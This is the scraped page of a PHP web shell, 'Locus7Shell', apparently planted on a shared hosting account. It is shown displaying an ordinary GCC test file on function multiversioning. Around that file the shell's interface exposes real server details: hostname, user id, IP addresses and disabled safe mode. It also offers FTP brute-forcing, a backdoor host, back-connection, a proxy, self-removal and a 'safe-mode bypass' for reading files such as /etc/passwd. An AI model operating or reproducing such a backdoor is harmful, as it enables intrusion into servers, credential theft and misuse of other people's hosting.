Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     mv2.C (2.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Test case to check if Multiversioning chooses the correct
   dispatching order when versions are for various ISAs.  */
/* { dg-do run } */
/* { dg-require-ifunc "" }  */
/* { dg-options "-O2" } */

#include <assert.h>

/* Default version.  */
int foo () __attribute__ ((target ("default")));
/* The dispatch checks should be in the exact reverse order of the
   declarations below.  */
int foo () __attribute__ ((target ("mmx")));
int foo () __attribute__ ((target ("sse")));
int foo () __attribute__ ((target ("sse2")));
int foo () __attribute__ ((target ("sse3")));
int foo () __attribute__ ((target ("ssse3")));
int foo () __attribute__ ((target ("sse4.1")));
int foo () __attribute__ ((target ("sse4.2")));
int foo () __attribute__ ((target ("popcnt")));
int foo () __attribute__ ((target ("avx")));
int foo () __attribute__ ((target ("avx2")));
int foo () __attribute__ ((target ("avx512f")));

int main ()
{
  int val = foo ();

  if (__builtin_cpu_supports ("avx512f"))
    assert (val == 11);
  else if (__builtin_cpu_supports ("avx2"))
    assert (val == 10);
  else if (__builtin_cpu_supports ("avx"))
    assert (val == 9);
  else if (__builtin_cpu_supports ("popcnt"))
    assert (val == 8);
  else if (__builtin_cpu_supports ("sse4.2"))
    assert (val == 7);
  else if (__builtin_cpu_supports ("sse4.1"))
    assert (val == 6);
  else if (__builtin_cpu_supports ("ssse3"))
    assert (val == 5);
  else if (__builtin_cpu_supports ("sse3"))
    assert (val == 4);
  else if (__builtin_cpu_supports ("sse2"))
    assert (val == 3);
  else if (__builtin_cpu_supports ("sse"))
    assert (val == 2);
  else if (__builtin_cpu_supports ("mmx"))
    assert (val == 1);
  else
    assert (val == 0);

  return 0;
}

int __attribute__ ((target("default")))
foo ()
{
  return 0;
}

int __attribute__ ((target("mmx")))
foo ()
{
  return 1;
}

int __attribute__ ((target("sse")))
foo ()
{
  return 2;
}

int __attribute__ ((target("sse2")))
foo ()
{
  return 3;
}

int __attribute__ ((target("sse3")))
foo ()
{
  return 4;
}

int __attribute__ ((target("ssse3")))
foo ()
{
  return 5;
}

int __attribute__ ((target("sse4.1")))
foo ()
{
  return 6;
}

int __attribute__ ((target("sse4.2")))
foo ()
{
  return 7;
}

int __attribute__ ((target("popcnt")))
foo ()
{
  return 8;
}

int __attribute__ ((target("avx")))
foo ()
{
  return 9;
}

int __attribute__ ((target("avx2")))
foo ()
{
  return 10;
}

int __attribute__ ((target("avx512f")))
foo ()
{
  return 11;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--